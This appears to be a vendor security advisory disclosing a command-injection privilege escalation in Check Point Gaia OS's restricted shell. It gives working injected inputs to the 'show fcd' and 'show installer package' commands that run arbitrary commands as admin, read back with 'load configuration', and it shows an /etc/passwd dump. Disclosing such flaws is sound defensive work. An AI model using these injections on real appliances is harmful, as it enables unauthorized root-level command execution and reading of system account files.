[R3] Check Point Gaia OS Privilege Escalation

Check Point's Gaia OS drops SSH users into a restricted shell. The shell limits all but users with expert access from executing bash commands. However, with proper formatting, a low privileged user can trick the shell into executing arbitrary commands as the admin user.

For example, the lowest level user is the monitor user. This account should have very limited access. However, an attacker can execute bash commands through the show fcd command and read the output using load configuration:

checkpoint> show fcd Tenable;echo\ $(whoami;id;)>/tmp/monitor-out; all
checkpoint> load configuration /tmp/monitor-out
CLINFR0329  Invalid command:'admin uid=0(admin) gid=0(root)'.
Done.                                                        
CLICMD0159  Error at line 1. Could not execute all commands successfully.
checkpoint>

A more convenient vector for admin users (uid 0) is to use show installer package since it doesn't require a second command to read the output:

checkpoint> show installer package *;cat\ /etc/passwd>/dev/stderr;#
admin:x:0:0::/home/admin:/etc/cli.sh
monitor:x:102:100:Monitor:/home/monitor:/etc/cli.sh
root:x:0:0:root:/root:/sbin/nologin
test:x:0:100:Test:/home/test:/etc/cli.sh
nobody:x:99:99:Nobody:/:/sbin/nologin
postfix:x:1001:1001:Postfix:/home/postfix:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
qauser:x:0:100:Qauser:/home/qauser:/etc/cli.sh
pcap:x:77:77::/var/arpwatch:/sbin/nologin
halt:x:7:0:halt:/sbin:/sbin/halt
lowpriv2:x:0:100:Lowpriv2:/home/lowpriv2:/etc/cli.sh
lowpriv:x:1337:100:Lowpriv:/home/lowpriv:/etc/cli.sh
cp_postgres:x:1008:0:Postgres:/home/cp_postgres:/bin/sh
_nonlocl:x:96:100:Non-local user:/home/_nonlocl:/etc/cli.sh
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
checkpoint>